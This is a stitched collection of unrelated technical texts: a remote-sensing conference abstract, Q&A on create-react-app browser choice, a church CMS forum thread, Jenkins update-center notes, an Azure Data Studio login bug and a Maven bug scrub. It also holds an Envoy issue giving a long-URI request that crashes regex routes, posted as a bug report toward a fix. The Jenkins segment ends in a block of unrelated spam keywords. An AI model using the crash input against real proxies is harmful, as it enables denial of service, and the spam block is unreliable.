Free and open data access policy to Landsat-8 and Sentinel-2 satellite imagery has stimulated the development of atmospheric correction (AC) processors for generating Bottom-of-Atmosphere (BOA) products. Several entities have started to generate (or plan to generate in the short term) BOA reflectance products at global scale for Landsat-8 and Sentinel-2 missions. To this end, the EuropeanSpace Agency (ESA) and National Aeronautics and Space Administration (NASA) have initiated the Atmospheric Correction Inter-comparison Exercise (ACIX) in the frame of CEOS Cal/Val Working Group.ACIX is an international collaborative initiative to inter-compare a set of atmospheric correction (AC) processors for high-spatial resolution optical sensors. The first ACIX experiment started in June 2016 with the aim to bring together developers of state-of-the-art atmospheric correction (AC) processors and study the variations amongst the different approaches. The input data were Landsat8 and Sentinel-2A imagery over various sites of different land cover types around the world, i.e. agricultural, deserts, urban, snow and coastal areas. The description and conclusions of this first experiment are summarised in (Doxani et al, 2018). All the inter-comparison results can be found in the dedicated to ACIX I web site in CEOS Cal/Val portal. The enhancements of the participating processors in ACIX I and the increasing interest from additional AC developers to be part of the experiment stimulated the continuation of ACIX and its second implementation (ACIX II). Similarly to the first exercise, ACIX II focus on Landsat-8 and Sentinel-2 imagery over a set of test areas. Concerning Sentinel-2, the products of both -2A and -2B missions are included in the input datasets. The test sites of ACIX II have been redefined and more representative cases, concerning land cover and aerosol types, are included comparing to the ones of ACIX I. Particular attention are also given to aquatic sites, i.e. coastal and inland waters, which were analysed as a separate sub-category. Following the recommendations of ACIX participants and Earth Observation data users, an additional inter-comparison of cloud cover assessment was performed in parallel with ACIX, named Cloud Masking Inter-comparison eXercise (CMIX). Cloud screening is a crucial step of the radiometric pre-processing of optical remotely sensed data and an important uncertainty contributor to the retrieval of accurate surface reflectance within an atmospheric correction process. Therefore, it was considered essential to analyse these two processing chains concurrently. The presentation will describe in details ACIX-II (land) and CMIX and discuss early results and lessons learned. AGU Fall Meeting Abstracts - Pub Date: - December 2019 - 0402 Agricultural systems; - 0426 Biosphere/atmosphere interactions; - 0430 Computational methods and data processing; - 0480 Remote sensing;
OPCFW_CODE
why vscode open react app in edge instead of chrome? I just started a project with react-create-app template typescript. When I do npm run dev it opens edge browser, I was expecting chrome. Any idea how to make it open in chrome? Does this answer your question? create-react-app: How do I "npm start" with a specific browser? To solve this, I need to give a default setting in vscode. It was empty, when it's empty, vscode will open edge, that's their favorite browser, it's hard code in their app, so open the vs setting and set the default to chrome. Before I set the default to chrome. it was empty "". From Create React App documentation By default, Create React App will open the default system browser, favoring Chrome on macOS. Specify a browser to override this behavior, or set it to none to disable it completely. If you need to customize the way the browser is launched, you can specify a node script instead. Any arguments passed to npm start will also be passed to this script, and the url where your app is served will be the last argument. Your script's file name must have the .js extension. Easy answer is to change your default browser. However if you want to keep your default browser to Edge you can do this. BROWSER=chrome npm start BROWSER=chrome npm run dev Consider that browser names are different. For example, Chrome is google chrome on macOS, google-chrome on Linux and chrome on Windows. Linux "start": "BROWSER='google-chrome-stable' react-scripts start" Windows "start": "BROWSER='chrome' react-scripts start" Mac "start": "BROWSER='google chrome' react-scripts start" This helped me. But I'll make an amendment. I had to do this: (in Win10) "start": "set BROWSER='chrome'; react-scripts start" I use FireFox for most of my web projects. However, in this instance I need Chrome. So, I can't just change the default at the OS/IDE level. Likely it opens in your default browser, this is an OS setting. This question might probably gives the answer: create-react-app: How do I "npm start" with a specific browser? In short: "By default, Create React App will open the default system browser, favoring Chrome on macOS." from the documentation. My guess is that your default browser is set to Edge, and if you set it to Chrome, it will open it in Chrome instead. (Windows) It may very well be a default web browser situation in which you'll need to do a search for Default apps --> click on the current browser under Web browser --> select preferred browser. I made the mistake of installing Microsoft Edge on my Mac. I didn't set it to the default web browser and verified that Chrome is the default. However, ever since then, when I run npm start, the development server insists on trying to launch the app in Edge. Even after deleting Edge, it prompts: "Choose Application - Where is Microsoft Edge?" So I simply chose Google Chrome at that prompt, which I tried to avoid but couldn't quickly find an alternative. The other answers aren't quite correct. VSCode's choice of which browser to open is a bit ... idiosyncratic. Chrome is used by default (if it's installed) on MacOS, regardless of whether it's the OS's default browser. I don't have a Windows machine, but it sounds like Edge might be getting the same treatment there. To make VSCode use your OS's actual default browser, you'll need to prefix your NPM script entry with an assignment statement that clears the value of the BROWSER variable. It'll look something like this: "scripts": { "frontend": "BROWSER= npm start", ... } Note the empty space after BROWSER= in the command above. This sets the value of the variable to [nothing], which triggers VSCode using your OS default browswer.
STACK_EXCHANGE
route regex match fails for large URIs Description: We've noticed that requests with a very long URI crashes our envoy service for routes defined using a regex matcher. We're not sure if it's due to some overflow bug in Envoy's regex parser, but ideally Envoy should not crash because of a long URI. Repro steps: Define a route with a match regex like the following: "match": { "regex": "/asdf/.*" } and then make a request with a large URI: val longString = "a" * (50 * 1024) client.send("GET", "/asdf/{longString}") We've gotten around it by using a prefix matcher instead, but this appears to be a potential DoS vulnerability if not a security issue. cc. @jmarantz Yeah regexes are like that. See the recent fun that happened at Cloudflare: https://blog.cloudflare.com/cloudflare-outage/ and for more detail in: https://blog.cloudflare.com/details-of-the-cloudflare-outage-on-july-2-2019/ I think you will be a lot happier with prefix-match :) So I wouldn't be surprised that a regex can cause Envoy to get very low. I also might expect in some cases the regex library might throw during a match operation (not sure about this), and this path may not be well tested in Envoy. If that's an actual possibility I'd say the action-item for this bug is to repro and test a case where matching throws. Another course of action is to add RE2 capability to Envoy. RE2 has a more restricted regex language which prevents catastrophic backtracking and also executes the regexes it does accept much more quickly than std::regex. @jmarantz erm, Cloudflare's regex was much more complex ((?:(?:\"|'|\]|\}|\\|\d|(?:nan|infinity|true|false|null|undefined|symbol|math)|\`|\-|\+)+[)]*;?((?:\s|-|~|!|{}|\|\||\+)*.*(?:.*=.*)))) and failed because of backtracking. Regex in this issue (/asdf/.*) is as trivial as it gets, and it's not acceptable for it to be a DoS vector. We should really move away from std::regex to RE2 or PCRE2 with limited backtracking. For this reason I hate that we support regex matching at all. This type of situation is IMO almost unavoidable, though I agree with @PiotrSikora we should do better on this simple case. Agreed. In any case I'll also note that we've observed that std::regex does memory allocations during matching, so it's possible that this crash could have been an OOM. I'm pretty sure RE2 does not do allocations during matching @yanavlasov might know for sure. The .* matcher in std::regex is recursive. It runs out of typical 1Mb stack with ~16k input. It will certainly OOM on 50k input. std::regex has known issues and is not safe for general purpose use. I think the POR here is going to be to add a new "safe_regex" type using https://github.com/google/re2 and deprecate the existing regex matchers in various places. I can take this on. FWIW this is the underlying bug: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=86164 I tested with libstdc++ and libc++. libstdc++ crashes OOM at ~50K string length, and takes ~1000usec / regex_match. libc++ doesn't OOM but at 50K takes ~9500usecs / regex_match. So libc++ may not be a great solution for this issue since 1msec of CPU is quite a lot. Re2 in comparision takes ~15useconds / FullMatch independent of string size. @jplevyak nice, thanks for looking at that. FYI I'm working on re2. @jplevyak thanks for the benchmark, we're in same page that adding re2 support (via different field safe_regex to keep the API backward compatibility) is the way to go. I agree either of std::regex implementation in libstdc++ or libc++ is not great. The point of using libc++ is not because it doesn't OOM nor perform better, it is more because that's what we does in fuzzing test, so fuzzers weren't able to catch issue like this. Is it safe to assume that the issue potentially exists in configurations that define virtual_clusters match patterns (and not just route matches)? @mhite yes. See https://github.com/envoyproxy/envoy/pull/7878 for WIP fix.
GITHUB_ARCHIVE
I have, either bravely or foolishly, volunteered to design and host a Church website for a Church that currently has no electronic presence (beyond a Yahoo e-mail address). I'm planning static information pages, rolling news stories, group mailing lists, calendar with events, and possibly to look at podcasting sermons later on. The most important bit is that it isn't tied to heavily to one individual (me or anyone else) such that the website folds as and when that person leaves the area or becomes too busy. I mostly have experience with Drupal which I'm not sure will do the job with a lot of hacking (specifically around the calendar/events issue), and Wordpress- which possibly will. Despite great plugins and a auto-updater I'm not sold that this is the best solution for this type of site (although many do use it as such). What I do use has to be free, Open Source, and should ideally have a reasonably strong community offering plugins and support so if I'm hit by the proverbial bus life (for the website at least) will go on. I'm not scared of a challenge and learning a new system, but it must be easy to maintain and update once in place. Have you any suggestions or practical experience to relay for a project of this type, both technical (the right CMS, features to try and those to avoid, good plugins) and human (how to achieve user buyin from a diverse community). On that note, the Church is outward looking and has a diverse range of ages and backgrounds, so this may impact the choice of style and design. All comments appreciated. Last edited by pwds; 22nd February 2010 at 03:28 PM. Reason: Typo +1 - Wordpress is very easy to maintain, use and lots of cool plug-ins... just make sure you're on the latest version to ensure no takeovers by skiddies putting pictures of devils on it, kids can be sad like that. I found Joomla to be a GOD send, I've actually done 4 Church sites so far why I don't know. If you set the restrictions for them to login and submit articles to different categories and upload newsletter with DOCman they'll be happy! Having tried to implement a calendar on a Wordpress site, I would say to avoid it if that is an important feature for you. I love Wordpress but there are no really good calendar plugins that I've found - most I've tried either aren't being actively maintained or have theme issues that require hacking around. P.S. More than happy if someone can prove me wrong! How easy is it to implement an event calendar in Joomla? Are there any good plugins for e-mail lists? +1 for joomla, im really getting into it and is suprisingly good when you sit down and give it time. I'd say to use Joomla as well. Have just had a quick look at calendars for it and have found this extension JEvents - Joomla! Extensions Directory also there is this list of extensions for Email Lists Mailing & Distribution Lists - Joomla! Extensions Directory pwds (6th May 2010) I'm still to get the "clients", that is to say the Pastor, to come and sit down and tell me what they want- or provide any content on request. At present the Church is mid name-change and has no logo, no "corporate colours" and newsletters are just typed sheets without design, so it's been really hard to actually get anything done beyond a vanilla site. That said I have installed Joomla (and updated), downloaded and unzipped the excellent Edugeek package and uploaded the orange theme via FTP (thanks guys), got maps and directions curtesy of Google and got a calendar up. I've also got a backup strategy for them so hopefully they won't lose everything in a hack/host change. Welcome to The Dales Christian Centre The questions I have for now are related to the rokslideshow module. I uploaded the latest version direct from the makers and have it set show images from a "comingsoon" directory. I intend to create a dedicated FTP account for (that will have the root- and only- folder as the one defined for these images). The idea is that the EU can treat this as close to a normal windows folder as possible, dragging news images in and deleting those for events that have passed. Does anyone have any suggestions on how to make this as "idiot proof" as possible for non technical end users. I had been planning to add a Network Place in Windows although I'm not sure if you can use SFTP for this. Does anyone have a better suggestion for management of these images? Is there a good plugin (including paid) where you can upload via the backend GUI and set expiry against the image at the same time- so they're not having to remember to do it? Lastly, from a design perspective, I've been drafted in to help with the design of our own Church as well following their migration to Wordpress after a virus attack. I'll probably move the Dales website closer to the look of this Wordpress theme I hacked about a bit to their spec, so for the benefit of both Churches have you got any design comments/suggestions. The development address New Life Church Derby which will change when I get the go ahead to take it live e107 or Joomla are my recommendations I have in fact installed Joomla with reference to the OP, thank you Last edited by pwds; 6th May 2010 at 04:45 PM. Most definitely Wordpress... by far the nicest CMS system I've used, huge community backing, great SEO (probably not too big a deal for a non profit organisation), and easy to write custom themes for. I'm surprised at the suggestion of E107, having used it a couple of times (our old school site was built on it) I would personally avoid at all costs - it also produces some really nasty code! Also if you can't be arsed to write a custom theme the themes out there are poor at the best of times. Last edited by SteveP; 13th May 2010 at 12:16 PM. I havent had issues with e107. If you work it properly, it is an effective CMS, but not as good as Joomla in that respect There are currently 1 users browsing this thread. (0 members and 1 guests)
OPCFW_CODE
AZURE CONNECTION DOESN'T WORK Type: Bug "Failed to get subscriptions" message after log in to azure. I'm able to manage dbs from azure portal but not from Data Studio. Issue occured after the update. Please, fix it. Azure Data Studio version: azuredatastudio 1.44.0 (31bee67f005648cdc9186f28ef39b4f1d6585e0f, 2023-05-19T16:52:43.653Z) OS version: Darwin x64 22.4.0 Restricted Mode: No Preview Features: Enabled Modes: System Info Item Value CPUs Apple M1 Pro (10 x 24) GPU Status 2d_canvas: enabledcanvas_oop_rasterization: disabled_offdirect_rendering_display_compositor: disabled_off_okgpu_compositing: enabledmetal: disabled_offmultiple_raster_threads: enabled_onopengl: enabled_onrasterization: enabledraw_draw: disabled_off_okskia_renderer: enabled_onvideo_decode: enabledvideo_encode: enabledvulkan: disabled_offwebgl: enabledwebgl2: enabledwebgpu: disabled_off Load (avg) 5, 5, 6 Memory (System) 32.00GB (2.17GB free) Process Argv Screen Reader no VM 0% Extensions: none Hi, The file is empty. Also attaching the screenshot of the exact error. 1-Azure Accounts.log @malabarMCB have you tried removing and readding the accounts? This could help clear out any invalid state. Also, the AAD implementation was updated in 1.44 to use SqlClient driver rather than MSAL.Net, which could have unexpected side-effects. You could try to disabling this update by unchecking the "Enable Sql Authentication Provider" option. It's unusual that the Azure log file would be empty if your hitting account errors. Are you seeing any other errors in the Help->Developer Tools Console, or the other log files? As the message says, you need to refresh credentials by re-authenticating with AAD. You can either refresh credentials in the linked accounts pane or remove and add account. If it doesn't work, to collect logs, make sure you reload ADS and once you reproduce the error again, you can either find logs in the "Azure Accounts" output pane or the Azure Accounts log file as per above. Once you open the file it will load logs from process and populate for you. @malabarMCB Do you have more than one Azure AD tenant under your account? I hit this issue as I have a few tenants some without any subs. To fix I had to add a tenant filter in the settings.json to exclude the tenants that don't have subs @malabarMCB have you tried removing and readding the accounts? This could help clear out any invalid state. Also, the AAD implementation was updated in 1.44 to use SqlClient driver rather than MSAL.Net, which could have unexpected side-effects. You could try to disabling this update by unchecking the "Enable Sql Authentication Provider" option. It's unusual that the Azure log file would be empty if your hitting account errors. Are you seeing any other errors in the Help->Developer Tools Console, or the other log files? Note: this could be related to #23210 it didn't help As the message says, you need to refresh credentials by re-authenticating with AAD. You can either refresh credentials in the linked accounts pane using the refresh icon or remove and add account. If it doesn't work, to collect logs, make sure you reload ADS and once you reproduce the error again, you can either find logs in the "Azure Accounts" output pane or the Azure Accounts log file as per above. Once you open the file it will load logs from process and populate for you. Side note: When fetching subscriptions, we continue to use MSAL.JS and this design is not related with 'Enable Sql authentication provider' setting. Tried to log out and log in a few times. Still the same error @malabarMCB Please try these steps: https://github.com/microsoft/azuredatastudio/issues/23286#issuecomment-1572668567 and let us know? Closing due to inactivity.
GITHUB_ARCHIVE
A change was made recently where, when you do "all kill" and target a monster (or presumably a person), the pet sometimes does not follow through with the attack and instead you see a message over the pet's head which says "That cannot be seen". If I had to guess, I'd say that maybe it's related to an intended fix for pets not teleporting into people's houses. It's causing problems in getting pets to attack where there's uneven terrain. I just did a T2a spawn at Damwin and the lumpy ground in that area seemed to interfere with having the pet succesfully attack. There was a rat mage standing a few tiles away from me and my superdragon, and I gave the "all kill" command repeatedly, but the dragon would not go onto target and instead gave that message. I stepped closer and closer to it (with dragon following) giving the command at each step, and the dragon finally went on target when we were standing 1 tile away from the rat mage. There were other incidents throughout the spawn like this, where my dragon was unable to go onto the target I wanted it to (yet that intended target was mana dumping on me) and I had to flee the area to survive. Please make this work better because otherwise it's gonna get tamers killed, including possibly in PVP. I'll record a video if it helps get across how goofy this is. In both PVP and PVM, if someone or something can be standing in what one expects to be "the open" and is able to cast spells or shoot arrows at me, it's critical that my tamer be able to target them succesfully with "all kill" and have it work similarly. I believe I've seen symptoms of this thing before. In Destard (with its uneven terrain in spots), pets using melee attacks (such as Hiryus and Cu Sidnes) that are trying to kill almost-dead, fleeing monsters sometimes go crazy instead. The pet darts back and forth, unable to pathfind succesfully to the monster. It's been my impression for a while now that lumpy terrain like is seen in Destard and parts of T2a can mess up pets' line-of-sight to their intended target. On the flip side, I've seen where at least in the past, monsters could teleport directly through a windowless wall into a private house. I saw this when I owned a house where Reapers that spawned nearby used to do it if someone was standing close enough to a wall. That house teleportation deal was definitely a problem that was best gotten rid of. But all things considered, this new thing may be worse than the old house teleportation thing. This new thing will affect my tamer much more often than any house-teleporting thing every did. So yeah - - - pleeeeez make this work better and like, if you reverted that change until the pet line-of-sight over lumpy terrain was working better, I wouldn't complain. Video will probably be coming if peeps don't seem to get what it's like when this happens.
OPCFW_CODE
CS 655 - Homework All homework must be completed individually. You may discuss the problems with others but you must turn in your own work. You may either (1) email me your PDF or PS homework file, (2) give me your homework in class, (3) give me your homework during my office hours, or (4) slip your homework under my office door. If the homework assignment includes a programming component, you must email me your code. Do not make use of any other delivery method for your homework (e.g., carrier pigeons, my faculty mailbox). Homework 1 Written (last update -- minor tweaks -- Wed Jan 25 20:16:43 EST 2006 Homework 1 Code. Homework 1 FAQ. Homework 1 Summary. Homework 2 Written (last update -- minor tweak in exercise 3 example programs -- Fri Jan 27 08:35:43 EST 2006 Homework 2 Code (verison 2) (last update -- fixes to make test -- Fri Jan 27 08:49:03 EST 2006 Homework 2 FAQ. Homework 3 Written. Liskov et al.'s Abstraction Mechanisms in CLU. What is "Object-Oriented Programming"?. Homework 3 Code. Homework 3 FAQ. Homework 4 Written (No code component. Work on your project proposal.) Homework 5 Written. Homework 5 Code (version 3!). Homework 5 FAQ. Simplify (for Windows) or Simplify (for Linux) or Simplify (for OS X) or Simplify (for Solaris) --- download one and rename it to $TOP/Simplify (i.e., put it in the same directory as nf.ml) Necula et al.'s CIL: Intermediate Language and Tools for Analysis and Transformation of C Programs Detlefs, Nelson and Saxe's Simplify: A Theorem Prover For Program Checking Manuvir Das' Unification-based pointer analysis with directional assignments (optional, the GOLF paper) Bush, Pincus and Seilaff's A Static Analyzer For finding Dynamic Programming Errors (optional, the PREfix paper) Homework 5 CIL Precompile for x86/Cygwin (optional, but if you can't build Cil yourself or you're getting those "Misc.Fatal_errors" when compiling, just drop this one in) Applications With Objective Caml (really optional, but if you feel you need extra help with OCaml, this book probably has the answers -- you can also talk to me) Random Somewhat-Related Humor - The Guru of Chelm (taking math too seriously) - Hamlet PowerPoint (problems with all-PowerPoint presentations) - Universal Poker (proof theory: why is Truth's opposite "Void"?) - How To Prove It (alternative techniques to structural induction) - Polynomial Hierarchy Collapses: Thousands Feared Tractable - GCC International (promoting international understanding) - Microsoft Buys TeX (note "What were we thinking?" and "third-party display driver") - Feel-Good Abstraction (at what level should we analyze and design?) - Parametric Worm (Microsoft security explained) - 1776 Computers - Security Important (system and user security) - Jobs Translated (meanings of terse utterances) Other Similar Courses Here are some example homeworks from similar courses at other universities (these should actually work as of 5pm Jan 17, but are probably a bit more "implementation-heavy" than what you'll see in
OPCFW_CODE
Symptoms A plugin release has been announced “plugin X version y.z” but it is not available in the Update Center in my instance. The update center in Jenkins can be replaced by defining a System Property hudson.model.UpdateCenter.className. Invalidates the update center JSON data for all the sites and force re-retrieval. void: doRestart org.kohsuke.stapler.StaplerResponse rsp Performs. \n This plugin prevents broken builds due to bad checkins. A commit by a user is pushed to a branch, Jenkins then merges the changes to the main repository, only if it does not break the build. jenkins首次安装,报错解决方案:该Jenkins实例似乎已离线并且在控制台出现出现如下错误:5. This ensures that the update center will list your plugin correctly once the new plugin version is released. If this is missing, or does not point to your Jenkins wiki page, your plugin will not be included in the update center. Changelogs. Once you have made your first release, you should add release notes to. jenkins插件清华大学镜像地址 mirrors.tuna..cn/jenkins/updates/update-center.json 1 更换地址方法 1.进入jenkins系统管理. 摘要:对于中小型运维团队,jenkins作为运维利器,可以解决很多工作中的痛点。基于UI的特性从而让使用者的入门成本很低,基于插件可以具备认证,记录,条件触发以及联动,让运维工程师可以将精力放在. Jenkins update center for Micro Focus Jenkins CI plugins Description. Here is an additional Jenkins update center to provide latest version of the jenkins plugin developed by Micro Focus. Plugins hosted in official Jenkins sites are not provided here. How to use The Jenkins official way. Due to issues with current Jenkins releases please use. Jenkins update center for ikedam plugins Description. Here is an additional Jenkins update center to provide plugins developed by ikedam. Plugins hosted in official Jenkins sites are not provided here. How to use. To have your Jenkins access to this update center, follow these instructions: Install UpdateSites Manager plugin to your Jenkins. 问题描述 在安装和配置Jenkins时,经常出现以下情况 1、插件安装失败2、显示插件安装成功,但其实是失败的 问题分析 两种情况基本都是因为升级站点问题,站点位于国外,访问. Many thanks for this, it was very helpful indeed. Also, as posting the data to the local server wasn't working in my case, I found that the same result can be achieved just creating an updates directory in the Jenkins home /var/lib/jenkins and copying the default.json file into it. jenkins-update-center-helper. Utilities for customizing the update-center.json read by Jenkins for plugin repositories. Issue How to configure the upstream source of my custom update centers? I have several version of Jenkins in my CJP cluster, how. 插件更新中心. Jenkins 安装完成后,默认的插件更新中心地址为 updates.jenkins.io/update-center.json. 除了正式版本以外,部分. 23/09/2013 · Lately there has been several cases where we wanted to deliver beta versions of the new plugins to interested users. To simplify this, we have created a new "experimental" update center, where alpha and beta releases of plugins will be available. Users who are. update jenkins Updatecenter from CLI. GitHub Gist: instantly share code, notes, and snippets. Create custom update-center.json Precondition URL based download enabled serverWEB-DAV support is best". How to make it. Create a basefolder in which plugins folder exists; Put custom plugins info basefolder/plugins pluginname.hpi, pluginname.wiki,.wiki should contain the detailed usage link about the plugin. jenkins-updates. |很久没有安装jenkins了,因为之前用的的服务器一直正常使用,令人郁闷的是,之前用jenkins一直没出过这个问题。 令人更郁闷的是,我尝试了好多个历史版本和最新版本,甚至从之前的服务器把jenkins在跑的程序打包copy这个服务器。.||The problem is I don't want to do it manually each time I want to update. I would like a way to automate the whole upgrade process. But you are right I was thinking about managing the whole jenkins installation in some kind of repository, updating it from another system and pushing the changes once the update.| Changing the update center URL is probably easiest with the UpdateSites Manager Plugin. Option 3: Rewrite the contents of the cached metadata files in JENKINS_HOME/updates e.g. default.json. If the plugin doesn't appear in your Jenkins Update Centre, visit Manage Plugins / Advanced and click the "Check now" button to make Jenkins retrieve the latest update-center.json data. Features. I'd like to keep the plugin as simple as possible, yet useful and effective. The problem may be due to the fact that we have problems with the SSL certificate, and by default Jenkins connects after https, when, for example, wants to download plugins for installation. Solution. To solve the above problem, just change the protocol from HTTPS to HTTP in the file hudson.model.UpdateCenter.xml and reconstruct Jenkins. Musica Tubidy Tekno Biglietti Di Congratulazioni Per Battesimo Stampabili Gratuitamente Scarica L'ultima Versione Di Adobe Photoshop Per PC Huawei P9 2017 Cena K Bl Telecomando Powerpoint Stampante Stl File 3d Gratuita Logo Cobra 427 Ac Radice Rct6303w87dk-5-0-lollipop Xda Disco Rigido Chkdsk Elenco A Discesa Del Progetto Redmine Vasca Da Bagno Per Bambini Icon Png Download Di Mojave Macbook Air 2015 Nota 4 Qualcomm Hs-usb Qdloader 9008 Software Disco Samsung Emoji Fiore Bianco Copia E Incolla Download Dell'aggiornamento 14393 Di Windows Pdf Cancella Informazioni Formato File Immagine Cr2 Prisma Tv Rosso X 8 Scarica Twrp Redmi Note 5 Miui 10 Lynda Premiere Pro Course Esempio Di Server Golang Ssh Convertire M3 In M2 Miglior App Locker Per Ios 11 Download Gratuito Del Modello Di Contratto Di Prestito Gestione Del Progetto Dmaic Sarkar 2020 Mp3 Starmusiq Download Gratuito Di Ubuntu Os Portatile Cuffia Wireless Jbl Jbl T500bt Nero Hard Disk Toshiba Canvio 2tb Usb 3.0 Trama Di Disegno Di Schizzo Driver Wifi Per Laptop Rv510 Samsung Software Per Computer Tubemate Nessun Vettore Icona Migliori Offerte IPhone 7 Plus Ricondizionate Python Ottiene Windows O Linux Aggiornamento Mac 10.6 8 Descrizione E Installazione Di Microsoft Office Professional Plus 2010 Gratis Tutto In Un Coupon Seo Plugin Di Poker Per Wordpress
OPCFW_CODE
The loser who tried to hack LUE2 with snake's help. Snakey: I hear you're starting a rebellion Alienwarrior2002: Are you a friend of Heartless? Alienwarrior2002: I'm going to hack a guy named Snake. Alienwarrior2002: How fast can you use PHP? Alienwarrior2002: Can you even do it? Alienwarrior2002: He runs LUE2. Alienwarrior2002: Okay. This guy named Snake runs LUE2. Snakey: uh huh Alienwarrior2002: He is a total douche. Alienwarrior2002: Me and Heartless want to hack his site. Snakey: yea totally Alienwarrior2002: Well, we need the LUE2 accounts Heartless and Ugghayo to get Administrator status. Snakey: it might be hard Alienwarrior2002: How long will it take? Snakey: lemme look Alienwarrior2002: Days? Weeks? Months? Years? Snakey: Can't you get back at him some other way? Alienwarrior2002: I'm not just doing this to get back at him. I'm going to overthrow him completely. Snakey: o rly? Snakey: so you're going to be the kew admin? Snakey: can i be a mod then? Alienwarrior2002: You can be admin if you want. Alienwarrior2002: Wait, though. Alienwarrior2002: Heartless said you could. Alienwarrior2002: Who are you on LUE2? Snakey: a concerened user willing to overthrow tyranny! Alienwarrior2002: No, I mean your username. Snakey: what if you tell snake Alienwarrior2002: HELL no. Snakey: snake will never find out :) Alienwarrior2002: I'm leading this. Why would I thro... a internet tool that lets u go to a website but it uses a different web address. use so you can go to website that are blocked from school or work "dude they blocked this tight site" 'who cares use proxies" A very fast rush in StarCraft used by Terran and Protoss players involving building your Gateway/Barracks near your opponent's base in order to minimize walking distance for your troops. I got owned by a proxy rush today. a website that lets you go on to sites during school where you aren't supposed to be on. I used a web proxy to go on to myspace during school.
OPCFW_CODE
Bug Scrub for Maven 3.2.0 A bug scrub is a review of all the bugs/issues for a specific target version to decide what issues will be addressed for the release. The mailing list thread starts here: http://mail-archives.apache.org/mod_mbox/maven-dev/201401.mbox/%3CCA%2BnPnMw6X9iWc93EB3Zvd_097qLHyTvnKDJO-MmyEZh83rx66w%40mail.gmail.com%3E Issues moved out of scope - http://jira.codehaus.org/browse/MNG-1977 Global dependency exclusions - http://jira.codehaus.org/browse/MNG-3397 Change the POM to use attributes - http://jira.codehaus.org/browse/MNG-5102 Mixin POM fragments - http://jira.codehaus.org/browse/MNG-2199 Version ranges not supported for parent artifacts - http://jira.codehaus.org/browse/MNG-2216 Add default encodings section to POM - http://jira.codehaus.org/browse/MNG-3826 Add profile activation when project version matches a regex - http://jira.codehaus.org/browse/MNG-2316 Add info to the poms for dependencies that implement an API or provide other dependencies - http://jira.codehaus.org/browse/MNG-3326 Profile Deactivation Configuration - http://jira.codehaus.org/browse/MNG-2557 Various enhancements to profiles - http://jira.codehaus.org/browse/MNG-2598 Profile element in POM should support overriding project.build.directory (WONTFIX candidate?) - http://jira.codehaus.org/browse/MNG-3726 Extend POM model to support declaration of IRC channels - http://jira.codehaus.org/browse/MNG-624 Automatic parent versioning - http://jira.codehaus.org/browse/MNG-4506 Split site deployment URLs into release vs. snapshot, just like artifacts - http://jira.codehaus.org/browse/MNG-3879 Dependency map and documentation - http://jira.codehaus.org/browse/MNG-2916 Default message and profile help messages - http://jira.codehaus.org/browse/MNG-2478 add filtered resource directories to super POM - http://jira.codehaus.org/browse/MNG-5356 Make encrypt/decrypt logic pluggable http://jira.codehaus.org/browse/MNG-656 lazily resolve extensions - http://jira.codehaus.org/browse/MNG-5366 [Regression] resolveAlways does not force dependency resolution in Maven 3.0.4 - http://jira.codehaus.org/browse/MNG-4622 Throw Validation Error if pom contains a dependency with two different versions. - http://jira.codehaus.org/browse/MNG-683 Lifecycle mappings should specify phase bindings in terms of general functionality type - http://jira.codehaus.org/browse/MNG-841 Support customization of default excludes - http://jira.codehaus.org/browse/MNG-193 symmetry for outputs of a plugin - http://jira.codehaus.org/browse/MNG-3695 Allow dependencies' scopes to be managed without explicit versions - http://jira.codehaus.org/browse/MNG-3825 Dependencies with classifier should not always require a version. - http://jira.codehaus.org/browse/MNG-3321 Skip plugin and/or execution - http://jira.codehaus.org/browse/MNG-1569 Make build process info read-only to mojos, and provide mechanism for explicit out-params for mojos to declare - http://jira.codehaus.org/browse/MNG-1867 deprecate system scope, analyse other use cases - http://jira.codehaus.org/browse/MNG-4508 No way to avoid adding artifactId to site urls - http://jira.codehaus.org/browse/MNG-2381 Improved control over the repositories in the POM Unsure what the ask is here - http://jira.codehaus.org/browse/MNG-3474 Add parameter --internet to test Internet access with and without using proxy defined in settings.xml Any takers... looks like a nice small feature to add - http://jira.codehaus.org/browse/MNG-2893 Update the DefaultPluginManager to not use a project depMan for controlling it's transitive dependencies - Seems like a legitimate bug we should consider? - http://jira.codehaus.org/browse/MNG-426 create "maxmem" setting for all plugins to refer to I think this is now out of scope for core... but I would be interested in what others think - http://jira.codehaus.org/browse/MNG-3124 Inherit mailing lists from parent POM - Sounds like an issue building the internal model. Additionally this would not be a change that affects other consumers and their processing of dependencies, so this looks like a valid candidate to me. - http://jira.codehaus.org/browse/MNG-2807 ciManagement from parent is not merging with children Same as MNG-3124. Both issues are related it would seem - http://jira.codehaus.org/browse/MNG-4173 Remove automatic version resolution for POM plugins This is somewhat reasonable, but we have already kicked this can down the road and it may hinder adoption. I would be happy to kick this one to 4.x on the basis that most existing poms were written with the assumption that you could avoid specifying the plugin version... and we even omit the plugin version in the asf parent pom for some stuff... - http://jira.codehaus.org/browse/MNG-3092 Version ranges with non-snapshot bounds can contain snapshot versions Do we have a decision as to what we will do with this one? It is one of the longest discussions we have... - http://jira.codehaus.org/browse/MNG-5185 Improve "missing dependency" error message when _maven.repositories/_remote.repositories contains other repository ids than requested The attached patch does not address the real issue, namely being able to define specific repo id's as offline. I would be happy to take a stab at the real issue, but likely do not have the time. If nobody else has the time, we should move this to 3.2.x as it could be a patch level enhancement to the maven CLI options - http://jira.codehaus.org/browse/MNG-5378 Use m-s-u in core ACTION: krosenv to provide status update - http://jira.codehaus.org/browse/MNG-5353 Ignore pre-releases in exclusive upper bound [lw,up) ACTION: jvzyl will we be upping Aether to M4, in which case that will expose an alternative version range syntax that resolves this issue... OTOH that new syntax may cause issues for existing pom readers... in which case this becomes a push back to 4.x - http://jira.codehaus.org/browse/MNG-5205 Memory leak in StringSearchModelInterpolator - ACTION: krosenv to provide status update Issues being worked on - http://jira.codehaus.org/browse/MNG-5494 Add a license file that corresponds to each GAV in the distribution I think jvzyl has this one under control. Can be pushed back if necessary as what we have currently works, if somewhat sub-optimal - http://jira.codehaus.org/browse/MNG-3526 Small change to artifact version parsing. I have committed this issue Issues added to scope - https://jira.codehaus.org/browse/MNG-5176 Print build times in an ISO 8601-style manner
OPCFW_CODE
